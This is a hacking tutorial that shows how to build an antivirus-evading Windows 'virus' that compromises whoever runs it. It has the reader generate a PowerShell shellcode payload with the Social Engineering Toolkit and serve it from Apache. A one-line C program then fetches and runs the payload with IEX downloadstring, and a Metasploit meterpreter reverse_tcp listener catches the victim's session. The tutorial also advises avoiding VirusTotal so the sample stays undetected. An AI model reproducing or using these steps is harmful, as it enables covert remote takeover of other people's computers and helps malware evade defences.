How to Bypass Antivirus Using Powershell and Metasploit (Kali Tutorial)
So you want to create a meterpreter virus, but you keep getting caught by AV. How do you create one that will go undetected? In this tutorial, I'll teach you how to code your own simple virus that will download a powershell payload from an apache webserver and execute it - bypassing antivirus.
- Kali Linux
- A 'C' Compiler (I use gcc on Windows, I can't seem to get the kali version working)
- The Social Engineering Toolkit (preinstalled on kali)
- An Apache Webserver (preinstalled on kali)
- The Metasploit Framework (also preinstalled on kali)
We'll be using the Social Engineering Toolkit to create our powershell payload. To open it, type this in console:
From there, type 1 for "social engineering attacks", then 9 for "powershell attack vectors", and finally 1 for "powershell alphanumeric shellcode injector".
Now, you'll need to provide an "LHOST". If you didn't already know, this is your attacker machine's local IP adress (so long as you're attacking over a local area network). To determine it, open a new terminal window and type in:
Scroll up to the top to find the interface that's connected to your network (in my case, that's "eth0"). Find what I've highlighted, "inet", and next to it you'll find your local IP adress (in my case, it's 10.0.0.13). This is what you'll input for your LHOST.
Next, it'll prompt you to type in a "port for the reverse". It's referring to the "LPORT". Usually, I use "4444" as it's a meterpreter convention, but you can use any port you want so long as you remember it.
Then it will prompt you if you want to "start the listener now". Type "no", we'll do this manually later. For now we're done with SET.
Now we'll need to move that payload over to our apache webserver. To do so, open a terminal and type:
mv /root/.set/reports/powershell/x86_powershell_injection.txt /var/www/html/payload.txt
However, if you're still using Kali Linux 1 (not 2), use this command:
mv /root/.set/reports/powershell/x86_powershell_injection.txt /var/www/payload.txt
This is because, in Kali Linux version 2, the apache root directory was moved to the "html" folder inside of /var/www/.
Now, simply type:
service apache2 start
...and your webserver should be started.
To create the virus, I'm using windows notepad and MinGW's "gcc". The code for the virus is as follows:
system("powershell.exe \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.13/payload.txt '))\"");
Remember to change "10.0.0.13", as your LHOST (or local IP address) will likely be different.
Save this as "evil.c", then compile it using your favorite c compiler. In my case, I'm using gcc so I type:
gcc.exe D:\Hacking\evil.c -o D:\Hacking\evil.exe
Now we have our FUD ("fully undetectable") executable.
Lastly, we need to set up a listener to wait for a meterpreter session. Fire up the metasploit framework by typing:
Once it loads, type:
Now, you'll need to type a series of options so I'll list them out for you:
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 10.0.0.13
- set LPORT 4444
Again, remember to change LHOST to your local IP address, and change LPORT if you used something other than 4444.
Finally, type "exploit" and hit enter to start the listener. As soon as your victim runs the "evil.exe" virus, you'll get a session.
If you want to check your executable against antiviruses, I recommend against using VirusTotal. This is because they submit their signatures to antivirus companies - increasing the likelihood of your executable being detected. Instead, personally I use nodistribute.com because, if they're keeping to their word, the signatures aren't being submitted. Here are the results of my executable if you're interested:
I hope you found my post useful and easy to follow. As this is my first post here (or anywhere, for that matter), I would really appreciate any feedback on what I could do better. Anyways, thanks for reading my post, and good luck!